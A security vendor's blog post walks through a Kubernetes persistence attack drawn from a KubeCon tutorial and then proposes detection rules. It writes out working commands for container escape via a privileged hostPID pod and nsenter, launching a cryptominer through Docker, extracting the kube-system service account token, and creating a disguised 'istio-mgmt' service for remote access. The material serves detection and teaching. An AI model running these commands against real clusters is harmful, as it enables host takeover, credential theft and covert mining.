
Investigating Kubernetes Attack Scenarios in Threat Stack (part 2)

In part one of this two-part series, I showed how Threat Stack captures detailed metadata about operating system behaviors as they happen, using the example commands from attack scenario 1, which shows an opportunistic attack that lands a cryptominer. Here in part two, I'll use attack scenario 2 to illustrate how Threat Stack observes the behavior of an advanced attacker who is looking to gain persistence in a Kubernetes cluster.

Scenario 2: Sophisticated Pod Persistence

In this second scenario, a more experienced attacker gains access through another webshell. Like the first scenario, this one begins with some information-gathering commands to establish context on where the attacker has landed.

id; uname -a; cat /etc/lsb-release /etc/redhat-release; ps -ef; env | grep -i kube

We can observe this activity as it happens in Threat Stack:

Out of the gate, there’s nothing particularly malicious about this behavior, so Threat Stack would not fire any alerts. But because the platform is continuously recording activity, this data is available and is typically used during the course of a deeper forensics investigation.

Moving on, the attacker then reviews the information. They check for Kubernetes access, and find the limits of their permissions (our friend kubectl auth can-i makes a timely reappearance):

export PATH=/tmp:$PATH
cd /tmp; curl -LO; chmod 555 kubectl
kubectl get pods
kubectl get pods --all-namespaces
kubectl get nodes
kubectl auth can-i --list

The path of the attack looks fairly similar in Threat Stack thus far:

In this case, the experienced attacker with knowledge of Kubernetes internals can ascertain that, based on the success of the commands above, they likely have the permissions of a Kubernetes namespace admin. It’s a bit of a lucky break, but not as powerful as they’d like.

Now, it’s time to try some tricks. The Google tutorial cites infosec Twitter for this command to deploy a pod to own the node:

kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'

One of the keys to the command above is the "hostPID": true parameter, which runs the container in the host server's PID namespace, undoing part of the isolation you'd expect from the namespaces that Docker normally provides. With the host's processes now visible inside the container, nsenter gives low-level access to the Linux kernel's namespace subsystem itself, letting the attacker join the mount namespace of the host's PID 1. Together with "privileged": true, these are the basic mechanics that let the attacker break out of the container and gain root on the host.
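The isolation being defeated here can be seen directly in procfs. The following is a minimal sketch using only standard Linux /proc paths: every process exposes its namespaces as symlinks under /proc/&lt;pid&gt;/ns/, and two processes share a namespace only if those links resolve to the same inode.

```shell
# Print the mount-namespace identifier of the current shell.
# Inside an ordinary container, the host's PID 1 is not even visible in
# /proc; with "hostPID": true it is, which is what allows
# nsenter --mount=/proc/1/ns/mnt to join the host's mount namespace.
readlink "/proc/$$/ns/mnt"   # e.g. mnt:[4026531840]
```

Running this in two shells on the same host prints the same mnt inode, while a containerized shell prints a different one; that difference is exactly what hostPID plus nsenter erases.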

And of course, Threat Stack’s low-level visibility into Linux subsystems captures it all:

The attacker now has root on a node and works toward their objective of persistence. Instead of simply deploying the bitcoin miner through Kubernetes itself, the experienced attacker deploys a container directly through Docker. Since they’re root, it’s easy to do. And it’s more likely to evade detection because Kubernetes only knows what it is managing, and has no visibility into Docker commands.

The attacker launches the bitcoin miner using Docker:

docker run -d securekubernetes/bitcoinero -c1 -l10

Once the bitcoin miner is running, the attacker moves on to explore the cluster. With root on the node, the attacker steals the kubelet’s client certificate. Finding that the kubelet’s certificate does not have the necessary permissions, they pivot to the default kube-system service account token. With this bash command, the attacker populates a bash variable TOKEN and then uses it in a kubectl command to ask the Kubernetes API server whether they can get secrets.

TOKEN=$(for i in `mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'`; do if [ `cat $i` = 'kube-system' ]; then cat `echo $i | sed 's/.namespace$/\/token/'`; break; fi; done)
echo -e "\n\nYou'll want to copy this for later:\n\nTOKEN=\"$TOKEN\""
kubectl --token "$TOKEN" --insecure-skip-tls-verify --server=https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT auth can-i get secrets --all-namespaces
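The sed expression embedded in that loop is dense, so it helps to run it against a single sample line of `mount` output. The path below is hypothetical, but the transform is the attacker's own: keep lines mentioning "secret", capture the mount path containing "default", and append "/namespace", which the loop then reads to test for kube-system.

```shell
# A sample service-account secret mount line as it might appear in `mount`
# output inside a pod (the path itself is hypothetical):
line='tmpfs on /var/lib/kubelet/pods/abc/volumes/kubernetes.io~secret/default-token-x9z2k type tmpfs (rw,relatime)'

# The attacker's sed: filter on "secret", capture the mount directory,
# append "/namespace" so the loop can `cat` it and check for kube-system.
echo "$line" | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'
# Prints: /var/lib/kubelet/pods/abc/volumes/kubernetes.io~secret/default-token-x9z2k/namespace
```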

The kubectl auth can-i command returned “yes,” which is good news for the attacker. The attacker then moves to create a service and an endpoint that will give them remote access, naming both “istio-mgmt” so as to blend in and not arouse suspicion.

cat <<EOF | kubectl --token "$TOKEN" --insecure-skip-tls-verify --server=https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT apply -f -
apiVersion: v1
kind: Service
metadata:
  name: istio-mgmt
  namespace: kube-system
spec:
  type: NodePort
  ports:
    - protocol: TCP
      nodePort: 31313
      port: 31313
---
apiVersion: v1
kind: Endpoints
metadata:
  name: istio-mgmt
  namespace: kube-system
subsets:
  - addresses:
      - ip: `sed -n 's/^  *server: https:\/\///p' /var/lib/kubelet/kubeconfig`
EOF
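The ip: field above is filled in by another inline sed, which strips the https:// scheme from the server line of the kubelet's kubeconfig. Feeding it a sample line (the address below is hypothetical) makes the transform clear:

```shell
# A "server:" line as it typically appears in /var/lib/kubelet/kubeconfig
# (the address is hypothetical); the sed strips the scheme, leaving a bare
# IP suitable for an Endpoints manifest:
printf '    server: https://10.0.0.1\n' | sed -n 's/^  *server: https:\/\///p'
# Prints: 10.0.0.1
```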

At this point the attacker has a bitcoin miner running on a node that is hidden from the purview of Kubernetes orchestration, and they have external access to the Kubernetes API server.

Turning Attack Signal into Alerts

As we walked through the two attack scenarios, you were probably wondering, “How can we both detect and respond to these tactics?” All of the events highlighted above can be used to write rules within the Threat Stack platform.

Discovery Commands

Whether you are protecting a Kubernetes cluster, a container, or an EC2 instance, a common theme among attackers is the need to explore and learn about the system they find themselves on. The discovery commands used in both attack scenarios are common, but how common are they in your environments? How do you know if you do not measure? Creating a simple rule that itemizes common discovery commands lets us detect where this is happening in our environments and who is doing what.

The attacker also used environment-specific Kubernetes discovery commands. The kubectl auth can-i command, for example, reveals what permissions one has. Do your operators use this command often? Maybe just a subset of them? Why not write a rule and alert when this happens on a system, especially a container?
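Threat Stack rules are written in the platform itself, but as a generic illustration of the same idea, the Linux audit framework can record every execution of the discovery binaries seen in both scenarios. This is a sketch assuming auditd is installed; binary paths vary by distribution.

```
# /etc/audit/rules.d/discovery.rules (illustrative; adjust paths per distro)
# Log each execution of common discovery binaries under the key "discovery":
-w /usr/bin/id -p x -k discovery
-w /usr/bin/uname -p x -k discovery
-w /usr/bin/kubectl -p x -k discovery
```

Baselining the resulting audit events answers the "how common are they?" question before you ever tune an alert threshold.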

Suspicious Commands

Adding a simple rule to alert on the execution of suspicious commands or sensitive binaries helps provide visibility into who is doing what in your environment. Should our systems have interactive users? Should those users be running binaries like nsenter?
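Again as a generic analogue (assuming auditd rather than Threat Stack's own rule engine), a watch on sensitive binaries records every execution for alerting or review:

```
# /etc/audit/rules.d/suspicious-bins.rules (illustrative; paths vary)
# nsenter executions are rare on most fleets and worth flagging outright:
-w /usr/bin/nsenter -p x -k suspicious-bins
-w /usr/bin/docker -p x -k suspicious-bins
```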

Process Running from /tmp

Another common trend is an attacker running code from /tmp. In both scenarios the attacker downloads a binary and runs it from the /tmp directory. Knowing what commonly runs from /tmp in your environment can enable you to know when something “different” is observed. Do you normally see containers running kubectl commands? Probably not, but again, how do you know if you do not have visibility into these behaviors?
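The same audit framework can flag any execution out of /tmp. This sketch assumes auditd on a 64-bit x86 system; Threat Stack expresses the equivalent rule within its own platform.

```
# /etc/audit/rules.d/tmp-exec.rules (illustrative)
# Record every execve of a binary located under /tmp, keyed "tmp-exec":
-a always,exit -F arch=b64 -S execve -F dir=/tmp -k tmp-exec
```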

Alerts Summary

In summary, if you want to protect your Kubernetes clusters, you must be able to see what is happening in the containers within those clusters. Visibility into the pods, coupled with Kubernetes orchestration events, tells a clear story of what is happening both at the orchestration layer and within the pods.

Thanks for All the Pods

A special thank you to @tabbysable, @petermbenjamin, @jimmesta, and @BradGeesaman for their excellent KubeCon NA 2019 Tutorial Guide and accompanying presentation, which served as the basis for this article.

I hope it serves as a good example of the kind of full-stack security observability that Threat Stack provides — where every bit of relevant metadata is tracked across host servers, Docker, Kubernetes, and more. Not only is this useful for deep forensics, but Threat Stack’s powerful alerting engine can provide near-real-time alerts when suspicious commands are run. Let us know if you’re interested in learning more, and thanks for reading.